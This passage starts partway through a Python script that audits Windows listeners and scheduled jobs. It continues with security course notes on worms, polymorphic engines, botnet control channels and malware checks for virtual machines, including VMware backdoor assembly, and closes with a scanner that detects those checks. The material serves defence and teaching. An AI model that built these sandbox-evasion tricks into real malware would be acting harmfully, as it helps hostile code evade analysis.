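            yield "TCP", int(parts[1].rsplit(":", 1)[1]), int(parts[4])
        elif len(parts) == 4 and parts[0] == "UDP":      # UDP rows have no State column
            yield "UDP", int(parts[1].rsplit(":", 1)[1]), int(parts[3])


def audit_listeners(netstat_text, tasklist_text, baseline=BASELINE_LISTENERS):
    """Return listeners outside the baseline or owned by a known shell tool."""
    images = parse_tasklist(tasklist_text)
    findings = []
    for proto, port, pid in parse_listeners(netstat_text):
        image = images.get(pid, "<unknown pid>")
        if (port, image) in baseline and image not in REMOTE_SHELL_TOOLS:
            continue
        findings.append({"proto": proto, "port": port, "pid": pid, "image": image})
    return findings


def audit_at_jobs(at_text, baseline=BASELINE_JOBS):
    """Return `at` jobs whose command line is not in the baseline."""
    findings = []
    for line in at_text.splitlines():
        m = re.match(r"^\s*(?:\w+\s+)?(?P<id>\d+)\s+(?P<day>.+?)\s+(?P<time>\d{1,2}:\d{2} [AP]M)\s+(?P<cmd>.+?)\s*$", line)
        if m and m.group("cmd") not in baseline:
            findings.append({"id": int(m.group("id")), "time": m.group("time"), "command": m.group("cmd")})
    return findings


if __name__ == "__main__":
    for f in audit_listeners(NETSTAT_ANO, TASKLIST):
        print("unexpected listener:", f)
    for f in audit_at_jobs(AT_JOBS):
        print("unexpected at job:", f)
```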
From 2005, worms started carrying bots, which gave rise to botnets.
Multi-exploit: Nimda worms have 12 to 15 exploits (multiple ways) to break into a machine.
Polymorphic worms: the worm recodes itself when it re-infects another machine to evade detection.
1. Encrypt the original code of the worm with a random key (a simple XOR)
2. Generate a short decryptor for the key (PD)
3. This operation is done by the polymorphic engine (PE), which is included with the worm's code.
Open source toolkits to mutate exploits: ADMmutate, CLET and JempiScodes.
They can place Trojans and backdoors, which gave rise to botnets.
Metamorphic worms: the worm changes its functionality. It might download from C&C.
Defences
  o Buffer overflow protection
  o A process for rapid patching
  o Use HIDS, NIDS. Also contact the network management personnel to identify chokepoints at various places inside the organization where you can place filters.
  o Encrypt your desktops and laptops with software like PointSec, so that even if a bot gets in, it will not play with the data.
Propagation: e-mails, browser exploits, drive-by downloads.
Mechanisms for botnet control:
  o IRC from a Command & Control server: the most popular mechanism
  o Some bots periodically log in to some user on MySpace, or some blogs, to see the commands stored there.
  o Distributed P2P communication channels: commands are injected on one bot; the remaining bots check for updates with their neighbouring bots, take the command and spread it thereafter. Now the problem with a single C&C is resolved. The botnet becomes self-aware.
Botnets Detecting Virtual Machines
Since virtual machines are used to analyse malware, bots detect that they are running in a virtual machine and shut down their malicious activity.
Check memory artifacts: the file system, registry and running processes of the machine.
Redpill
  o Executes the instruction SIDT, which saves the address of the Interrupt Descriptor Table
  o If it is running on a real machine, the address is in lower memory (< 0xd0) near the operating system kernel
  o If it is running in a VM, the address value is higher
Scoopy doo: SIDT, SGDT, SLDT
  o SIDT: Store Interrupt Descriptor Table
  o SGDT: Store Global Descriptor Table
  o SLDT: Store Local Descriptor Table
  o If these values are consistent with virtualization, you are virtualized
Look for virtualized hardware
  o Look at the MAC, device drivers, interfaces
VMDetect: it runs instructions that only virtual machines execute, which result in an invalid instruction when run on a real machine.
VMware Backdoor I/O Port
Look for changes in processor behaviour that are associated with the communications channel. Clock synchronization, copy+paste, drag and drop etc. happen over this COM channel. The following operation invokes the backdoor functions:

  /* in Intel syntax (MASM and most Windows based assemblers) */
  MOV EAX, 564D5868h                    /* magic number */
  MOV EBX, command-specific-parameter
  MOV CX, backdoor-command-number
  MOV DX, 5658h                         /* VMware I/O Port */
  IN EAX, DX (or OUT DX, EAX)

  /* in AT&T syntax (gnu as and many unix based assemblers) */
  movl $0x564D5868, %eax;               /* magic number */
  movl command-specific-parameter, %ebx;
  movw backdoor-command-number, %cx;
  movw $0x5658, %dx;                    /* VMware I/O port */
  inl %dx, %eax; (or outl %eax, %dx)

In appearance it is just a straightforward I/O access operation. Depending on the command number that was passed to EBX, different operations are carried out.
Source code: http://chitchat.at.infoseek.co.jp/vmware/backdoor.html
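An analyst-side scanner for the VM-detection tricks described above (Red Pill's SIDT, Scoopy's SGDT/SLDT, and the VMware backdoor magic and port), added as an example; it is not part of the original notes or of any tool named there. It looks for the x86 byte encodings of those instructions in a raw code blob, so a sample that would go quiet inside the analysis VM can be flagged before it is run; the blob below is hand-assembled here, not a real sample.

```python
"""Scan raw 32-bit x86 code for the anti-VM checks described above.

Added example (not part of the original notes or of Red Pill, Scoopy or
VMDetect). It is a byte-pattern scan, not a disassembly, so confirm hits in a
disassembler; it errs on the side of reporting.
"""
import struct

VMWARE_MAGIC = 0x564D5868    # "VMXh", loaded into EAX
VMWARE_PORT = 0x5658         # "VX", loaded into DX

# Constructed sample: a prologue, the backdoor sequence from the notes assembled
# by hand (command parameter and number are arbitrary placeholders), a Red Pill
# style sidt, a Scoopy style sldt, and an epilogue.
SAMPLE = bytes([
    0x55, 0x89, 0xE5,                  # push ebp; mov ebp, esp
    0xB8, 0x68, 0x58, 0x4D, 0x56,      # mov eax, 0x564D5868
    0xBB, 0x0A, 0x00, 0x00, 0x00,      # mov ebx, 0x0A   (placeholder parameter)
    0x66, 0xB9, 0x0A, 0x00,            # mov cx, 0x0A    (placeholder command number)
    0x66, 0xBA, 0x58, 0x56,            # mov dx, 0x5658
    0xED,                              # in eax, dx
    0x0F, 0x01, 0x4C, 0x24, 0xFE,      # sidt [esp-2]    (Red Pill)
    0x0F, 0x00, 0xC0,                  # sldt ax         (Scoopy)
    0xC9, 0xC3,                        # leave; ret
])

MAGIC_LE = struct.pack("<I", VMWARE_MAGIC)
PORT_LE = struct.pack("<H", VMWARE_PORT)


def scan_anti_vm(code, port_window=16):
    """Return [(offset, description), ...] for anti-VM artefacts found in `code`."""
    findings = []
    last_port_mov = None
    for i in range(len(code)):
        # VMware magic as the immediate of mov eax (B8 imm32), or as a bare dword.
        if code[i:i + 4] == MAGIC_LE:
            if i > 0 and code[i - 1] == 0xB8:
                findings.append((i - 1, "mov eax, 0x564D5868 (VMware backdoor magic)"))
            else:
                findings.append((i, "bare dword 0x564D5868 (VMware backdoor magic)"))
        # 66 BA imm16: mov dx, imm16 with the backdoor port.
        if code[i:i + 2] == b"\x66\xBA" and code[i + 2:i + 4] == PORT_LE:
            findings.append((i, "mov dx, 0x5658 (VMware backdoor I/O port)"))
            last_port_mov = i
        # ED = in eax, dx / EF = out dx, eax; only reported if the port was just loaded,
        # otherwise a lone ED/EF byte would fire on ordinary data.
        if code[i] in (0xED, 0xEF) and last_port_mov is not None and i - last_port_mov <= port_window:
            findings.append((i, "in/out eax, dx after mov dx, 0x5658 (backdoor call)"))
        if code[i] == 0x0F and i + 2 < len(code):
            modrm = code[i + 2]
            reg, mod = (modrm >> 3) & 7, modrm >> 6
            # 0F 01 /0 = sgdt, 0F 01 /1 = sidt; both take a memory operand (mod != 11).
            if code[i + 1] == 0x01 and mod != 3 and reg in (0, 1):
                findings.append((i, "sidt (Red Pill)" if reg == 1 else "sgdt (Scoopy)"))
            # 0F 00 /0 = sldt, register or memory form.
            elif code[i + 1] == 0x00 and reg == 0:
                findings.append((i, "sldt (Scoopy)"))
    return findings


if __name__ == "__main__":
    for offset, what in scan_anti_vm(SAMPLE):
        print(f"offset {offset:#04x}: {what}")
```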